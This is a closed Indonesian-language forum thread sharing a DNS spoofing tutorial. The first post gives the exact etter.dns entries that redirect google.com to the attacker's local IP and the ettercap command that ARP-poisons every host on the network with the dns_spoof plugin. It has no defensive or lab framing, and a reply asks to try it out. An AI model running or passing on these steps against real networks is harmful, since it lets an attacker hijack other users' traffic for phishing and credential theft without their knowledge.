Thread Closed
[SHARE] DNS Spoofing (ettercap)
#1
Sorry seumpama ada yg sudah post tentang ini hehehehe
ane cuman berbagi Wink

DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain.

DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.

Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.

Oke langsung saja kita akan mencoba melakukan DNS Spoofing menggunakan Ettercap

1. Cari dulu letak ettercap nya
Quote:root@IBT:~# locate etter.dns
/usr/share/ettercap/etter.dns

2. Edit file etter.dns nya
Quote:root@IBT:~# nano /usr/share/ettercap/etter.dns

3. Ubah isi nya menjadi : (Ini contoh)
Quote:google.com A 192.168.1.20
*.google.com A 192.168.1.20
www.google.com PTR 192.168.1.20

Jadi waktu 1 jaringan buka google.com itu akan mengarah ke IP ane.
Isi etter.dns nya bisa di ganti sesuka hati hehehe yang di atas itu hanya contoh

# Buat jaga" lebih baik kalau file etter.dns nya di backup dulu Smile

4. Kita start ettercap nya
Quote:root@IBT:~# ettercap -Tqi [interface] -P dns_spoof -M arp // //
contoh : root@IBT:~# ettercap -Tqi wlan0 -P dns_spoof -M arp // //

5. Selesai :-bd

#2
Makasih bro
Izin nyoba ilmunya
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)


Thread Closed



Users browsing this thread: 1 Guest(s)